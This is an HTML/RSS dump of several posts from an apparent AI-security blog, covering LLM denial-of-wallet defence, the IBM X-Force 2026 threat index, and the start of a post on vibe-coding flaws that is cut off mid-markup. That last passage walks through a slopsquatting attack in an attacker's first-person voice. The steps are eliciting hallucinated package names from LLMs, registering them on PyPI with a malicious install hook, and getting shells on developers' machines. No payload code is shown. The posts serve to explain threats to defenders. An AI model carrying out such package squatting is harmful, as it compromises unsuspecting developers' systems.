src="https://substackcdn.com/image/fetch/$s_!n3uc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png" width="1160" height="758" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:758,&quot;width&quot;:1160,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:89594,&quot;alt&quot;:&quot;toxsec denial of wallet&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/191032922?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec denial of wallet" title="toxsec denial of wallet" srcset="https://substackcdn.com/image/fetch/$s_!n3uc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png 424w, https://substackcdn.com/image/fetch/$s_!n3uc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png 848w, https://substackcdn.com/image/fetch/$s_!n3uc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png 1272w, https://substackcdn.com/image/fetch/$s_!n3uc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff14228b7-1016-4b7f-8dbe-93f817033979_1160x758.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Cost-aware rate limiting</strong>, throttling based on token consumption instead of request count, is the defense most teams haven&#8217;t deployed. Without it, an attacker who figures out which prompts trigger the most expensive execution paths can drain your budget while staying comfortably under every traditional rate limit you&#8217;ve set. If your <a href="https://www.toxsec.com/p/ai-security-101">AI security checklist</a> doesn&#8217;t include hard spending caps and billing anomaly alerts, you&#8217;re running exposed.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops..</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What is the difference between model denial of service and denial of wallet?</h3><p>Model denial of service crashes or degrades an AI system by overwhelming its compute resources. Denial of wallet keeps the system running perfectly while draining the cloud budget through excessive token consumption. OWASP folded both into &#8220;Unbounded Consumption&#8221; (LLM10:2025) because the attack surface now includes availability, cost, and model theft in a single risk category.</p><h3>How much can an LLM denial of wallet attack actually cost?</h3><p>Real-world incidents show costs from $46,000 per day (Sysdig&#8217;s LLMjacking research on AWS Bedrock) to $82,000 in 48 hours (a stolen Google Gemini API key reported in March 2026). Costs scale with the model&#8217;s per-token pricing, available quota limits, and how many regions the attacker hits simultaneously. Stolen credentials sell for as little as $30, making the ROI obscene for the attacker.</p><h3>Can a WAF or standard rate limiter prevent LLM denial of service?</h3><p>Standard rate limiters count requests, not cost. An attacker can stay under your request limit while triggering the most expensive execution paths available. Effective defense requires cost-aware rate limiting that tracks token consumption per user, hard spending caps on cloud accounts, and billing anomaly alerts that flag usage spikes before they become six-figure invoices.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[IBM X-Force 2026 Threat Index Confirms AI Made Offense Cheap]]></title><description><![CDATA[Vulnerability exploitation, credential theft, ransomware fragmentation, and supply chain compromise all surged in IBM&#8217;s latest threat intelligence data.]]></description><link>https://www.toxsec.com/p/ibm-x-force-2026-confirms-ai-supercharged</link><guid isPermaLink="false">https://www.toxsec.com/p/ibm-x-force-2026-confirms-ai-supercharged</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 22 Mar 2026 13:31:11 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/189435488/8d823cae19843dc10454eb3ea1c243cf.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> The IBM X-Force 2026 Threat Intelligence Index tracked a 44% spike in public-facing app exploitation, over 300,000 stolen ChatGPT credentials on dark web markets, 109 active ransomware groups, and a 4x increase in supply chain compromises since 2020. Vulnerability exploitation is now the #1 initial access vector, and AI made every step faster.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>How AI Vulnerability Discovery Changed the IBM X-Force 2026 Numbers</h2><p>IBM X-Force tracked <strong>a 44% year-over-year increase</strong> in attacks beginning with exploitation of public-facing applications. The <a href="https://www.ibm.com/reports/threat-intelligence">2026 X-Force Threat Intelligence Index</a> pins the cause on two things: missing authentication controls and AI-enabled vulnerability discovery. We&#8217;ve moved past script kiddies lobbing Nmap scans at random /16 blocks. Models now parse exposed API docs, fingerprint stacks, and correlate unpatched versions against known exploit chains faster than a SOC analyst can finish morning standup.</p><p>Here&#8217;s the number that should keep you up: <strong>56% of the vulns X-Force tracked in 2025 required zero authentication to exploit</strong>. No credential bypass needed because there was no credential requirement in the first place. Wide-open endpoints, sitting on the internet, and AI made it trivially easy to find every single one at scale. X-Force tracked nearly 40,000 vulnerabilities across the year. The combination of misconfigured access controls and increasingly complex application stacks gave attackers a buffet of exposed surfaces, and the models brought the appetite.</p><h2>Why 300,000 Stolen ChatGPT Credentials Landed on the Dark Web</h2><p>Infostealers expanded their target lists in 2025. X-Force found <strong>over 300,000 ChatGPT credential sets</strong> advertised on dark web markets, harvested by commodity malware like Raccoon and Vidar. The same families that grab browser cookies and SSO tokens now grab AI session credentials too. IBM flagged this as a signal: AI platforms now carry the same credential risk as core enterprise SaaS.</p><p>A compromised chatbot login opens a different kind of exposure. Inside someone&#8217;s ChatGPT account, an attacker reads every conversation the user had with the model. Proprietary code reviews, strategy documents pasted in for summarization, internal data used as context. Then there&#8217;s the offensive angle: <a href="https://www.toxsec.com/p/fck-your-guardrails">prompt injection from the attacker side</a>, manipulating outputs, poisoning future sessions, exfiltrating data the user feeds in next. Password reuse between personal and enterprise accounts creates lateral paths that credential stuffing tools eat for breakfast. If your org hasn&#8217;t scoped AI platforms into its credential monitoring program, this is the wake-up call. The <a href="https://www.toxsec.com/p/the-voluntary-exfiltration-program">voluntary exfiltration problem</a> we wrote about last year just got a receipt from IBM&#8217;s incident data.</p><h2>How Ransomware Ecosystem Fragmentation Accelerates AI-Driven Attacks</h2><p>The big gangs fractured. X-Force counted <strong>109 distinct ransomware and extortion groups</strong> in 2025, up from 73 the year before. That&#8217;s a 49% jump. The top 10 groups&#8217; share of total activity dropped 25%, meaning the long tail got longer and noisier. Smaller cells, harder to attribute, harder to predict.</p><p>Leaked tooling lit the fuse. Builder kits from LockBit and Babuk made it trivial for any halfway competent crew to stand up a ransomware operation overnight. Stack AI on top and these small shops automate recon, craft phishing lures, and adapt payloads without a dedicated dev team. The <a href="https://newsroom.ibm.com/2026-02-25-ibm-2026-x-force-threat-index-ai-driven-attacks-are-escalating-as-basic-security-gaps-leave-enterprises-exposed">IBM newsroom release</a> puts it bluntly: attackers reuse playbooks and tap AI to automate operations. Manufacturing stayed the most targeted sector at 27.7% of incidents. Financial services sat right behind it. North America ate 29% of all observed attacks, the most-targeted region for the first time in six years.</p><h2>Why Supply Chain Attacks Quadrupled Since 2020</h2><p>Supply chain compromises nearly quadrupled over five years. Attackers target CI/CD pipelines, poison trusted developer identities, and ride SaaS integration trust relationships downstream into production environments. Rather than breaking through the front door, they walk in through a vendor&#8217;s back door with valid creds. Nick Bradley from X-Force Threat Intelligence nailed the mechanic: modern software sits on sprawling webs of dependencies, cloud services, and APIs, and the connectivity itself creates the vulnerability.</p><p>AI coding assistants accelerate this problem. More code gets shipped faster, and that code occasionally pulls in unvetted dependencies that nobody audits until the breach report drops. Vulnerability exploitation hit <strong>40% of all incidents</strong> X-Force responded to in 2025, making it the single most common initial access vector. The blurring line between nation-state and financially motivated operators means the talent pool doing this work is deep and getting deeper. Techniques that used to live in APT playbooks are showing up in financially motivated campaigns because <a href="https://www.toxsec.com/p/ai-kill-chain-explained">the AI kill chain</a> doesn&#8217;t care who&#8217;s pulling the trigger. You can run a perfect security program internally, patch everything, train your users, enforce MFA. Then a third-party vendor gets popped through their build pipeline and your data shows up in the breach report anyway.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What are the biggest findings in the IBM X-Force 2026 Threat Intelligence Index?</h3><p>The report tracked a 44% increase in public-facing application exploitation, over 300,000 stolen ChatGPT credentials on dark web markets, 109 active ransomware and extortion groups (up 49%), and a nearly 4x increase in supply chain compromises since 2020. Vulnerability exploitation became the leading cause of all incidents at 40%, and 56% of exploited vulnerabilities required no authentication.</p><h3>How is AI changing cyberattack tactics in 2026?</h3><p>AI accelerates the attacker lifecycle at every stage. Models automate vulnerability discovery, fingerprint exposed stacks, and correlate unpatched versions against known exploits at scale. Ransomware crews use AI for recon, phishing lure generation, and payload adaptation. AI coding tools also introduce supply chain risk by shipping unvetted dependencies faster than security teams can audit them.</p><h3>Which industries were most targeted according to IBM X-Force 2026?</h3><p>Manufacturing topped the list at 27.7% of all incidents observed by X-Force, followed by financial services and insurance. North America became the most-targeted region for the first time in six years, absorbing 29% of total attacks, up from 24% in 2024.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[Vibe Coding Security Flaws Ship Shells, Keys, and Admin Access]]></title><description><![CDATA[Slopsquatting, hardcoded API keys, and broken auth in AI-generated code form a compound attack chain starting at pip install.]]></description><link>https://www.toxsec.com/p/vibe-coding-security-attack-chain</link><guid isPermaLink="false">https://www.toxsec.com/p/vibe-coding-security-attack-chain</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Thu, 19 Mar 2026 13:31:43 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!RL5M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RL5M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RL5M!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!RL5M!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!RL5M!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!RL5M!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RL5M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7713504,&quot;alt&quot;:&quot;AI pair programmer security vulnerabilities vibe coding slopsquatting hardcoded secrets broken authentication LLM-generated code risks&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190338370?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc41b5947-029b-4c8c-9e74-b9c6e3d28cd8_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="AI pair programmer security vulnerabilities vibe coding slopsquatting hardcoded secrets broken authentication LLM-generated code risks" title="AI pair programmer security vulnerabilities vibe coding slopsquatting hardcoded secrets broken authentication LLM-generated code risks" srcset="https://substackcdn.com/image/fetch/$s_!RL5M!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!RL5M!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!RL5M!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!RL5M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa956a2cc-ad2d-42db-ad73-ceafe13615a5_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> We prompt an AI assistant until it hallucinates a package name, register it on PyPI before anyone installs it, grep the repo for credentials the LLM committed, then walk through the admin route the AI forgot to protect. Three vibe coding security flaws. </p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Is Slopsquatting and How Vibe Coding Creates It</h2><p>When you vibe code, you describe what you want and the AI writes it. Fast, popular, and it has a failure mode we&#8217;re already monetizing. Somewhere in that output is a <code>pip install some-package-name</code>. You run it, and it works. Or it looks like it works.</p><p>Here&#8217;s the problem. A <strong>package</strong> is a chunk of pre-built code your project pulls from a public registry instead of writing from scratch. LLMs don&#8217;t query PyPI, the Python package registry, before suggesting a dependency. The model pattern-matches to what a package for that task would <em>probably</em> be called. Sometimes the name is real, sometimes the model invented it, and it sounds equally confident either way.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xJPz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xJPz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png 424w, https://substackcdn.com/image/fetch/$s_!xJPz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png 848w, https://substackcdn.com/image/fetch/$s_!xJPz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png 1272w, https://substackcdn.com/image/fetch/$s_!xJPz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xJPz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png" width="834" height="339" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:339,&quot;width&quot;:834,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:26876,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190338370?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xJPz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png 424w, https://substackcdn.com/image/fetch/$s_!xJPz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png 848w, https://substackcdn.com/image/fetch/$s_!xJPz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png 1272w, https://substackcdn.com/image/fetch/$s_!xJPz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4b5e269-dda7-4d70-b970-829ba7b87bfb_834x339.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>That gap is the entire attack. We prompt LLMs with niche coding tasks and log every package name that doesn&#8217;t exist on any registry. Some names repeat across sessions, across models, same hallucination on a loop. A <a href="https://arxiv.org/abs/2501.02497">2025 academic study analyzing 576,000 AI-generated code samples</a> found hallucinated packages appear roughly 20% of the time, and 43% of those names repeat consistently. Predictable means registerable.</p><p>We check PyPI. Not claimed. We register the name with a functional README, plausible version history, and a malicious install hook that fires the moment someone runs <code>pip install</code>. This is <strong>slopsquatting</strong>, a supply chain attack where we pre-register the phantom dependency names that AI coding tools <a href="https://www.toxsec.com/p/distillation-raids-slopsquatting">hallucinate into existence</a>.</p><p>Then we search GitHub for <code>requirements.txt</code> files containing our package names. Find repos where the AI-generated README has the install command verbatim. Dev copy-pasted it, never checked, ran it. We have a shell.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!848M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!848M!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png 424w, https://substackcdn.com/image/fetch/$s_!848M!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png 848w, https://substackcdn.com/image/fetch/$s_!848M!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png 1272w, https://substackcdn.com/image/fetch/$s_!848M!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!848M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png" width="593" height="359" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b130c528-1596-42db-894d-bb3387502c6b_593x359.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:359,&quot;width&quot;:593,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:22712,&quot;alt&quot;:&quot;PyPI package page for &#8220;flask-orient-connector&#8221;, published yesterday, 0 downloads, single maintainer with no other packages, next to a terminal showing pip install flask-orient-connector completing successfully, nuclear green on black&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190338370?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="PyPI package page for &#8220;flask-orient-connector&#8221;, published yesterday, 0 downloads, single maintainer with no other packages, next to a terminal showing pip install flask-orient-connector completing successfully, nuclear green on black" title="PyPI package page for &#8220;flask-orient-connector&#8221;, published yesterday, 0 downloads, single maintainer with no other packages, next to a terminal showing pip install flask-orient-connector completing successfully, nuclear green on black" 